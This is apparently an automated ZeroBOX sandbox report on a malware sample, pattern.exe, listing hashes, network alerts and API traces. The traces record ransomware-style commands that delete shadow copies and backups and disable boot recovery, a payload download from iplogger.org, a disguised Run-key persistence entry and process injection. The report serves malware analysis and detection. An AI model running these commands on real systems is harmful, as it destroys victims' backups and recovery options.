Summary | ZeroBOX

pattern.exe

NPKI, Emotet, Gen1, Formbook, Generic Malware, ASPack, Malicious Library, Malicious Packer, Admin Tool (Sysinternals etc ...), Anti_VM, JPEG Format, MSOffice File, PNG Format, PE File, OS Processor Check, PE32, DLL
Category: FILE
Machine: s1_win7_x6401
Started: Sept. 1, 2021, 9:32 a.m.
Completed: Sept. 1, 2021, 9:41 a.m.
Size 416.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 dcef208fcdac3345c6899a478d16980f
SHA256 824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc
CRC32 D886582B
ssdeep 6144:iYdiLQNWloaXoLJYksETr0vpvejH6ols25A0LJjI4WHB/N7:BiLQqosgZs+8vejap0LJ6h
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

IP Address Status Action
158.69.65.151 Active Moloch
164.124.101.2 Active Moloch
88.99.66.31 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49209 -> 88.99.66.31:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49203 -> 158.69.65.151:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49207 -> 158.69.65.151:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49206 -> 158.69.65.151:80 2015500 ET POLICY Geo Location IP info online service (geoiptool.com) Potential Corporate Privacy Violation
TCP 192.168.56.101:49201 -> 158.69.65.151:80 2015500 ET POLICY Geo Location IP info online service (geoiptool.com) Potential Corporate Privacy Violation

Suricata TLS

Flow Issuer Subject Fingerprint

TLSv1 192.168.56.101:49209 -> 88.99.66.31:443
Issuer: C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA
Subject: CN=*.iplogger.org
Fingerprint: 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb

TLSv1 192.168.56.101:49203 -> 158.69.65.151:443
Issuer: C=LV, L=Riga, O=GoGetSSL, CN=GoGetSSL RSA DV CA
Subject: OU=Domain Control Validated, OU=GoGetSSL Domain SSL, CN=geodatatool.com
Fingerprint: e3:80:27:7e:2d:8c:ee:78:ea:85:bf:d4:76:57:c2:f6:5f:73:2f:5f

TLSv1 192.168.56.101:49207 -> 158.69.65.151:443
Issuer: C=LV, L=Riga, O=GoGetSSL, CN=GoGetSSL RSA DV CA
Subject: OU=Domain Control Validated, OU=GoGetSSL Domain SSL, CN=geodatatool.com
Fingerprint: e3:80:27:7e:2d:8c:ee:78:ea:85:bf:d4:76:57:c2:f6:5f:73:2f:5f

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\system32>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: bcdedit
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /set {default} bootstatuspolicy ignoreallfailures
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\system32>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: bcdedit
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /set {default} recoveryenabled no
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\system32>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: wbadmin
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: delete catalog -quiet
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\system32>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: wbadmin
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: delete systemstatebackup
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\system32>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: wbadmin
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: delete systemstatebackup -keepversions:0
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\system32>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: wbadmin
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: delete backup
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Windows\system32>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: wmic
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: shadowcopy delete
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Windows\system32>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: vssadmin
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: delete shadows /all /quiet
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: ERROR: Description = Initialization failure
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2005 Microsoft Corp.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Error: Unexpected failure: Class not registered
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: ERROR: Description = Initialization failure
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2005 Microsoft Corp.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Error: Unexpected failure: Class not registered
console_handle: 0x00000007
1 1 0
section .code
section .rdatau
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
pattern+0x2de87 @ 0x42de87
pattern+0x2e6a3 @ 0x42e6a3
pattern+0x31781 @ 0x431781
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: df 2c 01 df 28 83 f9 08 7e 11 df 68 08 83 f9 10
exception.symbol: pattern+0x3031
exception.address: 0x403031
exception.module: pattern.exe
exception.exception_code: 0xc0000005
exception.offset: 12337
registers.esp: 1637920
registers.edi: 5636352
registers.eax: 0
registers.ebp: 1637976
registers.edx: 34012760
registers.ebx: 27721728
registers.esi: 1638008
registers.ecx: 24
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 40037888
registers.edi: 3205308
registers.eax: 40037888
registers.ebp: 40037968
registers.edx: 2918196
registers.ebx: 40038252
registers.esi: 2147746133
registers.ecx: 2974992
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72506f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72506e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x725027a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72502652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x7250253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72502411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x725025ab
wmic+0x39c80 @ 0x1f9c80
wmic+0x3b06a @ 0x1fb06a
wmic+0x3b1f8 @ 0x1fb1f8
wmic+0x36fcd @ 0x1f6fcd
wmic+0x3d6e9 @ 0x1fd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 1369624
registers.edi: 1957755408
registers.eax: 1369624
registers.ebp: 1369704
registers.edx: 1
registers.ebx: 2944620
registers.esi: 2147746133
registers.ecx: 2630094028
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 41546012
registers.edi: 4839260
registers.eax: 41546012
registers.ebp: 41546092
registers.edx: 4556596
registers.ebx: 41546376
registers.esi: 2147746133
registers.ecx: 4613392
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x721b6f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x721b6e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x721b27a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x721b2652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x721b253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x721b2411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x721b25ab
wmic+0x39c80 @ 0x1f9c80
wmic+0x3b06a @ 0x1fb06a
wmic+0x3b1f8 @ 0x1fb1f8
wmic+0x36fcd @ 0x1f6fcd
wmic+0x3d6e9 @ 0x1fd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3139640
registers.edi: 1957755408
registers.eax: 3139640
registers.ebp: 3139720
registers.edx: 1
registers.ebx: 4583020
registers.esi: 2147746133
registers.ecx: 2630317271
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET http://geoiptool.com/
suspicious_features GET method with no useragent header suspicious_request GET https://www.geodatatool.com/
request GET http://geoiptool.com/
request GET http://iplogger.org/1L3ig7.gz
request GET https://www.geodatatool.com/
request GET https://iplogger.org/1L3ig7.gz
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 1331200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01e70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 1331200
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1456
region_size: 1331200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01e80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 1331200
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1976
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x724b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2236
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72811000
process_handle: 0xffffffff
1 0 0
domain geoiptool.com
file C:\Users\test22\AppData\Local\Temp\~temp001.bat
cmdline "C:\Windows\system32\cmd.exe" /C C:\Users\test22\AppData\Local\Temp\~temp001.bat
cmdline "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
cmdline "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
cmdline "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
cmdline "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
cmdline "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
cmdline wmic shadowcopy delete
wmi SELECT * FROM Win32_ShadowCopy
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0
cmdline "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
cmdline wmic shadowcopy delete
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f8
1 0 0

NtAllocateVirtualMemory

process_identifier: 492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f8
1 0 0

NtAllocateVirtualMemory

process_identifier: 492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00110000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f8
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\csrss.exe reg_value "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
Process injection Process 2072 created a remote thread in non-child process 492
Time & API Arguments Status Return Repeated

CreateRemoteThread

thread_identifier: 2532
process_identifier: 492
function_address: 0x00110000
flags: 0
stack_size: 0
parameter: 0x00100000
process_handle: 0x000004f8
1 1480 0
Process injection Process 2072 manipulating memory of non-child process 492
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f8
1 0 0

NtAllocateVirtualMemory

process_identifier: 492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00100000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
